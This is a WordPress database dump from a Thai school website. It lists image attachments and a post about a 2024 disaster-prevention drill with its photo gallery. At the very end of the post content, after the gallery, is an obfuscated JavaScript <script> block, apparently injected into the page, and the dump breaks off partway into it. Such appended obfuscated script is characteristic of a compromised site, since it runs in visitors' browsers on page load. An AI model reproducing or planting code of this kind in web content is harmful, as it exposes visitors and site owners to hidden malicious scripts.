(956,1,'2024-08-20 11:56:42','2024-08-20 04:56:42','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_7','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-15','','','2024-08-20 11:56:42','2024-08-20 04:56:42','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_7.jpg',0,'attachment','image/jpeg',0),
(957,1,'2024-08-20 11:56:44','2024-08-20 04:56:44','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_6','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-16','','','2024-08-20 11:56:44','2024-08-20 04:56:44','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_6.jpg',0,'attachment','image/jpeg',0),
(958,1,'2024-08-20 11:56:44','2024-08-20 04:56:44','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_5','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-17','','','2024-08-20 11:56:44','2024-08-20 04:56:44','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_5.jpg',0,'attachment','image/jpeg',0),
(959,1,'2024-08-20 11:56:46','2024-08-20 04:56:46','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_2','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-18','','','2024-08-20 11:56:46','2024-08-20 04:56:46','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_2.jpg',0,'attachment','image/jpeg',0),
(960,1,'2024-08-20 11:56:47','2024-08-20 04:56:47','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_4','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-19','','','2024-08-20 11:56:47','2024-08-20 04:56:47','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_4.jpg',0,'attachment','image/jpeg',0),
(961,1,'2024-08-20 11:56:49','2024-08-20 04:56:49','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_1','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-20','','','2024-08-20 11:56:49','2024-08-20 04:56:49','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_1.jpg',0,'attachment','image/jpeg',0),
(962,1,'2024-08-20 11:56:49','2024-08-20 04:56:49','','LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_3','','inherit','','closed','','line_album_%e0%b8%aa%e0%b8%b2%e0%b8%98%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b8%a0%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%a8%e0%b8%a3%e0%b8%a9%e0%b8%90%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%9e%e0%b8%ad%e0%b9%80-21','','','2024-08-20 11:56:49','2024-08-20 04:56:49','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/LINE_ALBUM_สาธารณภัยเศรษฐกิจพอเพียง_240820_3.jpg',0,'attachment','image/jpeg',0),
(963,1,'2024-08-20 12:01:11','2024-08-20 05:01:11','','S__69214221_0','','inherit','','closed','','s__69214221_0-2','','','2024-08-20 12:01:11','2024-08-20 05:01:11','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214221_0-1.jpg',0,'attachment','image/jpeg',0),
(964,1,'2024-08-20 12:01:57','2024-08-20 05:01:57','','S__69214221_0','','inherit','','closed','','s__69214221_0-3','','','2024-08-20 12:01:57','2024-08-20 05:01:57','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214221_0-2.jpg',0,'attachment','image/jpeg',0),
(965,1,'2024-08-20 12:01:57','2024-08-20 05:01:57','','S__69214223_0','','inherit','','closed','','s__69214223_0-2','','','2024-08-20 12:01:57','2024-08-20 05:01:57','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214223_0-1.jpg',0,'attachment','image/jpeg',0),
(966,1,'2024-08-20 12:01:59','2024-08-20 05:01:59','','S__69214213_0','','inherit','','closed','','s__69214213_0-2','','','2024-08-20 12:01:59','2024-08-20 05:01:59','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214213_0-1.jpg',0,'attachment','image/jpeg',0),
(967,1,'2024-08-20 12:01:59','2024-08-20 05:01:59','','S__69214215_0','','inherit','','closed','','s__69214215_0-2','','','2024-08-20 12:01:59','2024-08-20 05:01:59','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214215_0-1.jpg',0,'attachment','image/jpeg',0),
(968,1,'2024-08-20 12:02:01','2024-08-20 05:02:01','','S__69214216_0','','inherit','','closed','','s__69214216_0-2','','','2024-08-20 12:02:01','2024-08-20 05:02:01','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214216_0-1.jpg',0,'attachment','image/jpeg',0),
(969,1,'2024-08-20 12:02:02','2024-08-20 05:02:02','','S__69214217_0','','inherit','','closed','','s__69214217_0-2','','','2024-08-20 12:02:02','2024-08-20 05:02:02','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214217_0-1.jpg',0,'attachment','image/jpeg',0),
(970,1,'2024-08-20 12:02:03','2024-08-20 05:02:03','','S__69214219_0','','inherit','','closed','','s__69214219_0-2','','','2024-08-20 12:02:03','2024-08-20 05:02:03','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214219_0-1.jpg',0,'attachment','image/jpeg',0),
(971,1,'2024-08-20 12:02:03','2024-08-20 05:02:03','','S__69214218_0','','inherit','','closed','','s__69214218_0-2','','','2024-08-20 12:02:03','2024-08-20 05:02:03','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214218_0-1.jpg',0,'attachment','image/jpeg',0),
(972,1,'2024-08-20 12:02:06','2024-08-20 05:02:06','','S__69214222_0','','inherit','','closed','','s__69214222_0-2','','','2024-08-20 12:02:06','2024-08-20 05:02:06','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214222_0-1.jpg',0,'attachment','image/jpeg',0),
(973,1,'2024-08-20 12:02:06','2024-08-20 05:02:06','','S__69214220_0','','inherit','','closed','','s__69214220_0-2','','','2024-08-20 12:02:06','2024-08-20 05:02:06','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214220_0-1.jpg',0,'attachment','image/jpeg',0),
(974,1,'2024-08-20 12:02:08','2024-08-20 05:02:08','','S__69214232_0','','inherit','','closed','','s__69214232_0-2','','','2024-08-20 12:02:08','2024-08-20 05:02:08','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214232_0-1.jpg',0,'attachment','image/jpeg',0),
(975,1,'2024-08-20 12:02:08','2024-08-20 05:02:08','','S__69214231_0','','inherit','','closed','','s__69214231_0-2','','','2024-08-20 12:02:08','2024-08-20 05:02:08','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214231_0-1.jpg',0,'attachment','image/jpeg',0),
(976,1,'2024-08-20 12:02:10','2024-08-20 05:02:10','','S__69214233_0','','inherit','','closed','','s__69214233_0-2','','','2024-08-20 12:02:10','2024-08-20 05:02:10','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214233_0-1.jpg',0,'attachment','image/jpeg',0),
(977,1,'2024-08-20 12:02:10','2024-08-20 05:02:10','','S__69214234_0','','inherit','','closed','','s__69214234_0-2','','','2024-08-20 12:02:10','2024-08-20 05:02:10','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214234_0-1.jpg',0,'attachment','image/jpeg',0),
(978,1,'2024-08-20 12:02:12','2024-08-20 05:02:12','','S__69214224_0','','inherit','','closed','','s__69214224_0-2','','','2024-08-20 12:02:12','2024-08-20 05:02:12','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214224_0-1.jpg',0,'attachment','image/jpeg',0),
(979,1,'2024-08-20 12:02:12','2024-08-20 05:02:12','','S__69214226_0','','inherit','','closed','','s__69214226_0-2','','','2024-08-20 12:02:12','2024-08-20 05:02:12','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214226_0-1.jpg',0,'attachment','image/jpeg',0),
(980,1,'2024-08-20 12:02:14','2024-08-20 05:02:14','','S__69214227_0','','inherit','','closed','','s__69214227_0-2','','','2024-08-20 12:02:14','2024-08-20 05:02:14','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214227_0-1.jpg',0,'attachment','image/jpeg',0),
(981,1,'2024-08-20 12:02:14','2024-08-20 05:02:14','','S__69214228_0','','inherit','','closed','','s__69214228_0-2','','','2024-08-20 12:02:14','2024-08-20 05:02:14','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214228_0-1.jpg',0,'attachment','image/jpeg',0),
(982,1,'2024-08-20 12:02:16','2024-08-20 05:02:16','','S__69214229_0','','inherit','','closed','','s__69214229_0-2','','','2024-08-20 12:02:16','2024-08-20 05:02:16','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214229_0-1.jpg',0,'attachment','image/jpeg',0),
(983,1,'2024-08-20 12:02:17','2024-08-20 05:02:17','','S__69214230_0','','inherit','','closed','','s__69214230_0-2','','','2024-08-20 12:02:17','2024-08-20 05:02:17','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214230_0-1.jpg',0,'attachment','image/jpeg',0),
(984,1,'2024-08-20 12:02:18','2024-08-20 05:02:18','','S__69214237_0','','inherit','','closed','','s__69214237_0-2','','','2024-08-20 12:02:18','2024-08-20 05:02:18','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214237_0-1.jpg',0,'attachment','image/jpeg',0),
(985,1,'2024-08-20 12:02:19','2024-08-20 05:02:19','','S__69214239_0','','inherit','','closed','','s__69214239_0-2','','','2024-08-20 12:02:19','2024-08-20 05:02:19','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214239_0-1.jpg',0,'attachment','image/jpeg',0),
(986,1,'2024-08-20 12:02:20','2024-08-20 05:02:20','','S__69214240_0','','inherit','','closed','','s__69214240_0-2','','','2024-08-20 12:02:20','2024-08-20 05:02:20','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214240_0-1.jpg',0,'attachment','image/jpeg',0),
(987,1,'2024-08-20 12:02:21','2024-08-20 05:02:21','','S__69214241_0','','inherit','','closed','','s__69214241_0-2','','','2024-08-20 12:02:21','2024-08-20 05:02:21','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214241_0-1.jpg',0,'attachment','image/jpeg',0),
(988,1,'2024-08-20 12:02:23','2024-08-20 05:02:23','','S__69214242_0','','inherit','','closed','','s__69214242_0-2','','','2024-08-20 12:02:23','2024-08-20 05:02:23','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214242_0-1.jpg',0,'attachment','image/jpeg',0),
(989,1,'2024-08-20 12:02:23','2024-08-20 05:02:23','','S__69214243_0','','inherit','','closed','','s__69214243_0-2','','','2024-08-20 12:02:23','2024-08-20 05:02:23','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214243_0-1.jpg',0,'attachment','image/jpeg',0),
(990,1,'2024-08-20 12:02:26','2024-08-20 05:02:26','','S__69214244_0','','inherit','','closed','','s__69214244_0-2','','','2024-08-20 12:02:26','2024-08-20 05:02:26','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214244_0-1.jpg',0,'attachment','image/jpeg',0),
(991,1,'2024-08-20 12:02:26','2024-08-20 05:02:26','','S__69214245_0','','inherit','','closed','','s__69214245_0-2','','','2024-08-20 12:02:26','2024-08-20 05:02:26','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214245_0-1.jpg',0,'attachment','image/jpeg',0),
(992,1,'2024-08-20 12:02:29','2024-08-20 05:02:29','','S__69214235_0','','inherit','','closed','','s__69214235_0-2','','','2024-08-20 12:02:29','2024-08-20 05:02:29','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214235_0-1.jpg',0,'attachment','image/jpeg',0),
(993,1,'2024-08-20 12:02:29','2024-08-20 05:02:29','','S__69214238_0','','inherit','','closed','','s__69214238_0-2','','','2024-08-20 12:02:29','2024-08-20 05:02:29','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214238_0-1.jpg',0,'attachment','image/jpeg',0),
(994,1,'2024-08-20 12:02:31','2024-08-20 05:02:31','','S__69214250_0','','inherit','','closed','','s__69214250_0-2','','','2024-08-20 12:02:31','2024-08-20 05:02:31','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214250_0-1.jpg',0,'attachment','image/jpeg',0),
(995,1,'2024-08-20 12:02:32','2024-08-20 05:02:32','','S__69214248_0','','inherit','','closed','','s__69214248_0-2','','','2024-08-20 12:02:32','2024-08-20 05:02:32','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214248_0-1.jpg',0,'attachment','image/jpeg',0),
(996,1,'2024-08-20 12:02:33','2024-08-20 05:02:33','','S__69214252_0','','inherit','','closed','','s__69214252_0-2','','','2024-08-20 12:02:33','2024-08-20 05:02:33','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214252_0-1.jpg',0,'attachment','image/jpeg',0),
(997,1,'2024-08-20 12:02:34','2024-08-20 05:02:34','','S__69214246_0','','inherit','','closed','','s__69214246_0-2','','','2024-08-20 12:02:34','2024-08-20 05:02:34','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214246_0-1.jpg',0,'attachment','image/jpeg',0),
(998,1,'2024-08-20 12:02:35','2024-08-20 05:02:35','','S__69214249_0','','inherit','','closed','','s__69214249_0-2','','','2024-08-20 12:02:35','2024-08-20 05:02:35','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214249_0-1.jpg',0,'attachment','image/jpeg',0),
(999,1,'2024-08-20 12:02:36','2024-08-20 05:02:36','','S__69214251_0','','inherit','','closed','','s__69214251_0-2','','','2024-08-20 12:02:36','2024-08-20 05:02:36','',905,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214251_0-1.jpg',0,'attachment','image/jpeg',0),
(1000,1,'2024-08-20 12:03:21','2024-08-20 05:03:21','<!-- wp:paragraph -->\n<p>วันที่ 19 สิงหาคม พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ร่วมกับ องค์การบริหารส่วนตำบลโพธิ์ จัดกิจกรรมตามโครงการโครงการซ้อมแผนปฏิบัติการป้องกันและบรรเทาสาธารณะภัย ประจำปีงบประมาณ 2567 เพื่อให้นักเรียนและบุคลากร ได้ปฏิบัติได้เมื่อเกิดสถานการณ์ที่ไม่คาดคิดเกิดคิด ได้อย่างทันทีและเกิดควาปลอดภัยแก่ตนเองและนักเรียน โดยกิจกรรมนี้ มีนักเรียนที่เข้าร่วม ได้แก่นักเรียนโรงเรียนบ้านผักขย่าใหญ่ และโรงเรียนบ้านปลาข่อ เข้าร่วมกิจกรรมครั้งนี้  </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":964,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214221_0-2-1024x576.jpg\" alt=\"\" class=\"wp-image-964\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":965,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214223_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-965\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":966,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214213_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-966\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":967,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214215_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-967\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":968,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214216_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-968\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":969,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214217_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-969\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":971,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214218_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-971\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":970,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214219_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-970\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":973,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214220_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-973\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":972,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214222_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-972\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":975,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214231_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-975\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":974,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214232_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-974\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":976,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214233_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-976\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":977,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214234_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-977\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":978,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214224_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-978\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":979,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214226_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-979\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":980,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214227_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-980\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":981,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214228_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-981\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":982,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214229_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-982\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":983,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214230_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-983\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":984,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214237_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-984\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":985,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214239_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-985\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":986,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214240_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-986\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":987,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214241_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-987\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":988,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214242_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-988\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":989,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214243_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-989\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":990,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214244_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-990\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":991,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214245_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-991\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":992,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214235_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-992\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":993,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214238_0-1-1024x576.jpg\" alt=\"\" class=\"wp-image-993\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":995,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214248_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-995\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":994,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214250_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-994\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":996,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214252_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-996\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":997,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214246_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-997\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":998,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214249_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-998\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":999,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__69214251_0-1-1024x578.jpg\" alt=\"\" class=\"wp-image-999\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return 